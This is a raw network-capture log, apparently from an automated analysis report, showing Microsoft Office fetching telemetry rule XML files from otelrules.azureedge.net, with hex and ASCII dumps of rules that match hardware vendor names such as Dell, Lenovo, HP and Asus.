                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        11192.168.2.44975913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:02 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:02 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:02 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 2160
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                        ETag: "0x8DC582BA3B95D81"
                                                                                        x-ms-request-id: 6eac4bdd-a01e-006f-1c91-3f13cd000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114802Z-174f7845968xlwnmhC1EWR0sv80000001140000000008du0
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:02 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        12192.168.2.44975813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:02 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:02 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:02 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 408
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                        ETag: "0x8DC582BB56D3AFB"
                                                                                        x-ms-request-id: dc0e4179-901e-005b-2991-3f2005000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114802Z-174f7845968qj8jrhC1EWRh41s00000011cg000000002fsq
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:02 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        13192.168.2.44976013.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:04 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:04 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:04 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 474
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                        ETag: "0x8DC582B9964B277"
                                                                                        x-ms-request-id: 8ccd6c39-f01e-0085-6e81-3f88ea000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114804Z-174f7845968j6t2phC1EWRcfe800000011mg000000002aax
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:04 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        14192.168.2.44976113.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:04 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:04 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:04 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 415
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                        ETag: "0x8DC582B9F6F3512"
                                                                                        x-ms-request-id: cdb469ae-c01e-0014-01b3-42a6a3000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114804Z-174f7845968px8v7hC1EWR08ng00000011hg0000000097v8
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:04 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        15192.168.2.44976313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:04 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:04 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:04 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 632
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                        ETag: "0x8DC582BB6E3779E"
                                                                                        x-ms-request-id: 6f96f590-e01e-0099-0e7f-3fda8a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114804Z-174f7845968nxc96hC1EWRspw8000000111000000000931f
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:04 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        16192.168.2.44976213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:04 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:04 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:04 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 471
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                        ETag: "0x8DC582BB10C598B"
                                                                                        x-ms-request-id: 30944020-a01e-0053-5e8b-3f8603000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114804Z-174f7845968vqt9xhC1EWRgten00000011a0000000009xrd
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:04 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        17192.168.2.44976413.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:04 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:04 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:04 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 467
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                        ETag: "0x8DC582BA6C038BC"
                                                                                        x-ms-request-id: 3360fb1d-601e-0097-3291-3ff33a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114804Z-174f784596886s2bhC1EWR743w00000011cg000000006vm9
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:04 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        18192.168.2.44976713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:06 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:06 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:06 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 427
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                        ETag: "0x8DC582BA310DA18"
                                                                                        x-ms-request-id: c665a67d-901e-002a-1b91-3f7a27000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114806Z-174f7845968n2hr8hC1EWR9cag0000001140000000000y7d
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:06 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        19192.168.2.44976513.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:06 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:06 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:06 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 407
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                        ETag: "0x8DC582BBAD04B7B"
                                                                                        x-ms-request-id: e2bedc78-c01e-0066-2f35-40a1ec000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114806Z-174f7845968glpgnhC1EWR7uec00000011eg000000009zkz
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:06 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        20192.168.2.44976813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:06 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:06 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:06 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 486
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                        ETag: "0x8DC582B9018290B"
                                                                                        x-ms-request-id: dc0e488f-901e-005b-3891-3f2005000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114806Z-174f7845968j6t2phC1EWRcfe800000011fg0000000080q4
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:06 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        21192.168.2.44976913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:06 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:07 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:06 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 407
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                        ETag: "0x8DC582B9698189B"
                                                                                        x-ms-request-id: 83c53042-b01e-0053-2eb2-42cdf8000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114806Z-174f78459684db9fhC1EWRc7g400000001a00000000083p9
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
